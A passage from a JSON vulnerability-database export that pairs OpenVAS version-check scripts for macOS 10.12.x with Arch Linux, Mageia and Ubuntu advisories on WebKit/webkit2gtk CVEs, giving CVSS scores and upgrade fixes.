latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\" || osVer == \"10.10.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n ## applying patch on 10.11.6 will upgrade build version to 15G1421\n ## applying patch on 10.10.5 will upgrade build version to 14F2315\n if(buildVer)\n {\n if((osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G1421\")) ||\n (osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F2315\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\")){\n fix = \"10.12.4\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-24T15:05:29", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2017-2486", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2392", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2017-2457", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310810728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810728", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207615\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810728\");\n script_version(\"2019-09-20T11:01:01+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\",\n \"CVE-2016-8743\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10160\",\n \"CVE-2016-10161\", \"CVE-2016-9935\", \"CVE-2017-2421\", \"CVE-2017-2438\",\n \"CVE-2017-2430\", \"CVE-2017-2462\", \"CVE-2017-2420\", \"CVE-2017-2427\",\n \"CVE-2017-2449\", \"CVE-2017-2379\", \"CVE-2017-2417\", \"CVE-2017-2431\",\n \"CVE-2017-2435\", \"CVE-2017-2450\", \"CVE-2017-2461\", \"CVE-2016-9586\",\n \"CVE-2016-7585\", \"CVE-2017-2429\", \"CVE-2017-2487\", \"CVE-2017-2406\",\n \"CVE-2017-2407\", \"CVE-2017-2439\", \"CVE-2017-2428\", \"CVE-2017-2418\",\n \"CVE-2017-2426\", \"CVE-2017-2416\", \"CVE-2017-2467\", \"CVE-2017-2489\",\n \"CVE-2016-3619\", \"CVE-2017-2443\", \"CVE-2017-2408\", \"CVE-2017-2436\",\n \"CVE-2017-2437\", \"CVE-2017-2388\", \"CVE-2017-2398\", \"CVE-2017-2401\",\n \"CVE-2017-2410\", \"CVE-2017-2440\", \"CVE-2017-2456\", \"CVE-2017-2472\",\n \"CVE-2017-2473\", \"CVE-2017-2474\", \"CVE-2017-2478\", \"CVE-2017-2482\",\n \"CVE-2017-2483\", \"CVE-2017-2458\", \"CVE-2017-2448\", \"CVE-2017-2390\",\n \"CVE-2017-2441\", \"CVE-2017-2402\", \"CVE-2017-2392\", \"CVE-2017-2457\",\n \"CVE-2017-2409\", \"CVE-2017-2422\", \"CVE-2016-10009\", \"CVE-2016-10010\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-7056\", \"CVE-2017-2403\",\n \"CVE-2016-5636\", \"CVE-2017-2413\", \"CVE-2017-2423\", \"CVE-2017-2451\",\n \"CVE-2017-2485\", \"CVE-2017-2425\", \"CVE-2017-2381\", \"CVE-2017-6974\",\n \"CVE-2016-7922\", \"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\",\n \"CVE-2016-7930\", \"CVE-2016-7931\", \"CVE-2016-7932\", \"CVE-2016-7933\",\n \"CVE-2016-7934\", \"CVE-2016-7935\", \"CVE-2016-7936\", \"CVE-2016-7937\",\n \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\", \"CVE-2016-7973\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\",\n \"CVE-2016-8574\", \"CVE-2016-8575\", \"CVE-2017-5202\", \"CVE-2017-5203\",\n \"CVE-2017-5204\", \"CVE-2017-5205\", \"CVE-2017-5341\", \"CVE-2017-5342\",\n \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\", \"CVE-2017-5485\",\n \"CVE-2017-5486\", \"CVE-2016-9533\", \"CVE-2016-9535\",\n \"CVE-2016-9536\", \"CVE-2016-9537\", \"CVE-2016-9538\", \"CVE-2016-9539\",\n \"CVE-2016-9540\", \"CVE-2017-2486\", \"CVE-2016-4688\", \"CVE-2017-2432\",\n \"CVE-2017-2490\", \"CVE-2017-7070\", \"CVE-2017-2477\", \"CVE-2017-5029\");\n script_bugtraq_id(95078, 95076, 91816, 94650, 95077, 95764, 95774, 95783, 95768,\n 94846, 97140, 97137, 95019, 97146, 85919, 97147, 97134, 95375,\n 96767, 94968, 94972, 94977, 94975, 91247, 97132, 95852, 94742,\n 94744, 94745, 94746, 94753, 94754, 94747, 97300, 97303);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 11:01:01 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 17:37:14 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.4\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T16:34:11", "description": "Arch Linux Security Advisory ASA-201704-9\n=========================================\n\nSeverity: Critical\nDate : 2017-04-28\nCVE-ID : CVE-2016-9642 CVE-2016-9643 CVE-2017-2367 CVE-2017-2376\nCVE-2017-2377 CVE-2017-2386 CVE-2017-2392 CVE-2017-2394\nCVE-2017-2395 CVE-2017-2396 CVE-2017-2405 CVE-2017-2415\nCVE-2017-2419 CVE-2017-2433 CVE-2017-2442 CVE-2017-2445\nCVE-2017-2446 CVE-2017-2447 CVE-2017-2454 CVE-2017-2455\nCVE-2017-2457 CVE-2017-2459 CVE-2017-2460 CVE-2017-2464\nCVE-2017-2465 CVE-2017-2466 CVE-2017-2468 CVE-2017-2469\nCVE-2017-2470 CVE-2017-2471 CVE-2017-2475 CVE-2017-2476\nCVE-2017-2481\nPackage : webkit2gtk\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-235\n\nSummary\n=======\n\nThe package webkit2gtk before version 2.16.1-1 is vulnerable to\nmultiple issues including arbitrary code execution, access restriction\nbypass, content spoofing, cross-site scripting, information disclosure,\nsame-origin policy bypass and denial of service.\n\nResolution\n==========\n\nUpgrade to 2.16.1-1.\n\n# pacman -Syu \"webkit2gtk>=2.16.1-1\"\n\nThe problems have been fixed upstream in version 2.16.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-9642 (denial of service)\n\nJavaScriptCore in WebKitGTK+ before 2.16.0 allows attackers to cause a\ndenial of service (out-of-bounds heap read) via a crafted Javascript\nfile.\n\n- CVE-2016-9643 (denial of service)\n\nThe regex code in WebKitGTK+ before 2.14.6 allows remote attackers to\ncause a denial of service (memory consumption) as demonstrated in a\nlarge number of ($ (open parenthesis and dollar) followed by {-2,16}\nand a large number of +) (plus close parenthesis).\n\n- CVE-2017-2367 (same-origin policy bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nweb site.\n\n- CVE-2017-2376 (content spoofing)\n\nAn issue has been found in WebKit, allowing remote attackers to spoof\nthe address bar by leveraging text input during the loading of a page.\n\n- CVE-2017-2377 (denial of service)\n\nThis issue involves the \u201cWebKit Web Inspector\u201d component. It allows\nattackers to cause a denial of service (memory corruption and\napplication crash) by leveraging a window-close action during a\ndebugger-pause state.\n\n- CVE-2017-2386 (same-origin policy bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nweb site.\n\n- CVE-2017-2392 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing attackers to execute\narbitrary code or cause a denial of service (memory corruption) via a\ncrafted app.\n\n- CVE-2017-2394 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2395 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2396 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2405 (arbitrary code execution)\n\nAn issue has been found in the \u201cWebKit Web Inspector\u201d component. It\nallows remote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) via a crafted web\nsite.\n\n- CVE-2017-2415 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code by leveraging an unspecified \u201ctype confusion.\u201d.\n\n- CVE-2017-2419 (access restriction bypass)\n\nAn issue has been found in WebKit, allowing remote attackers to bypass\na Content Security Policy protection mechanism via unspecified vectors.\n\n- CVE-2017-2433 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2442 (same-origin policy bypass)\n\nAn issue has been found in WebKit, involving the \u201cWebKit JavaScript\nBindings\u201d component. It allows remote attackers to bypass the Same\nOrigin Policy and obtain sensitive information via a crafted web site.\n\n- CVE-2017-2445 (cross-site scripting)\n\nAn issue has been found in WebKit, allowing remote attackers to conduct\nUniversal XSS (UXSS) attacks via crafted frame objects.\n\n- CVE-2017-2446 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code via a crafted web site that leverages the mishandling of\nstrict mode functions.\n\n- CVE-2017-2447 (information disclosure)\n\nAn issue has been found in WebKit, allowing remote attackers to obtain\nsensitive information or cause a denial of service (memory corruption)\nvia a crafted web site.\n\n- CVE-2017-2454 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2455 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2457 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2459 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2460 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2464 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2465 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2466 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2468 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2469 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2470 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2471 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in WebKit, allowing\nremote attackers to execute arbitrary code via a crafted web site.\n\n- CVE-2017-2475 (cross-site scripting)\n\nAn issue has been found in WebKit, allowing remote attackers to conduct\nUniversal XSS (UXSS) attacks via crafted use of frames on a web site.\n\n- CVE-2017-2476 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n- CVE-2017-2481 (arbitrary code execution)\n\nAn issue has been found in WebKit, allowing remote attackers to execute\narbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\nImpact\n======\n\nA remote attacker can bypass access restrictions, spoof content, access\nsensitive information, cause a crash and execute arbitrary code on the\naffected host.\n\nReferences\n==========\n\nhttps://webkitgtk.org/security/WSA-2017-0003.html\nhttps://security.archlinux.org/CVE-2016-9642\nhttps://security.archlinux.org/CVE-2016-9643\nhttps://security.archlinux.org/CVE-2017-2367\nhttps://security.archlinux.org/CVE-2017-2376\nhttps://security.archlinux.org/CVE-2017-2377\nhttps://security.archlinux.org/CVE-2017-2386\nhttps://security.archlinux.org/CVE-2017-2392\nhttps://security.archlinux.org/CVE-2017-2394\nhttps://security.archlinux.org/CVE-2017-2395\nhttps://security.archlinux.org/CVE-2017-2396\nhttps://security.archlinux.org/CVE-2017-2405\nhttps://security.archlinux.org/CVE-2017-2415\nhttps://security.archlinux.org/CVE-2017-2419\nhttps://security.archlinux.org/CVE-2017-2433\nhttps://security.archlinux.org/CVE-2017-2442\nhttps://security.archlinux.org/CVE-2017-2445\nhttps://security.archlinux.org/CVE-2017-2446\nhttps://security.archlinux.org/CVE-2017-2447\nhttps://security.archlinux.org/CVE-2017-2454\nhttps://security.archlinux.org/CVE-2017-2455\nhttps://security.archlinux.org/CVE-2017-2457\nhttps://security.archlinux.org/CVE-2017-2459\nhttps://security.archlinux.org/CVE-2017-2460\nhttps://security.archlinux.org/CVE-2017-2464\nhttps://security.archlinux.org/CVE-2017-2465\nhttps://security.archlinux.org/CVE-2017-2466\nhttps://security.archlinux.org/CVE-2017-2468\nhttps://security.archlinux.org/CVE-2017-2469\nhttps://security.archlinux.org/CVE-2017-2470\nhttps://security.archlinux.org/CVE-2017-2471\nhttps://security.archlinux.org/CVE-2017-2475\nhttps://security.archlinux.org/CVE-2017-2476\nhttps://security.archlinux.org/CVE-2017-2481", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-28T00:00:00", "type": "archlinux", "title": "[ASA-201704-9] webkit2gtk: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2017-04-28T00:00:00", "id": "ASA-201704-9", "href": "https://security.archlinux.org/ASA-201704-9", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Multiple security fixes in latest webkit2 update. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-16T06:29:12", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2377", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2405", "CVE-2017-2419", "CVE-2017-2442", "CVE-2017-2446", "CVE-2017-2454", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2017-04-16T06:29:12", "id": "MGASA-2017-0109", "href": "https://advisories.mageia.org/MGASA-2017-0109.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:05:33", "description": "JavaScriptCore in WebKit allows attackers to cause a denial of service\n(out-of-bounds heap read) via a crafted Javascript file.\n\n#### Bugs\n\n * <https://bugs.webkit.org/show_bug.cgi?id=164000>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-02-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642"], "modified": "2017-02-03T00:00:00", "id": "UB:CVE-2016-9642", "href": "https://ubuntu.com/security/CVE-2016-9642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:04:24", "description": "The regex code in Webkit 2.4.11 allows remote attackers to cause a denial\nof service (memory consumption) as demonstrated in a large number of ($\n(open parenthesis and dollar) followed by {-2,16} and a large number of +)\n(plus close parenthesis).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9643", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643"], "modified": "2017-03-07T00:00:00", "id": "UB:CVE-2016-9643", "href": "https://ubuntu.com/security/CVE-2016-9643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2396", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2396"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2396", "href": "https://ubuntu.com/security/CVE-2017-2396", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web 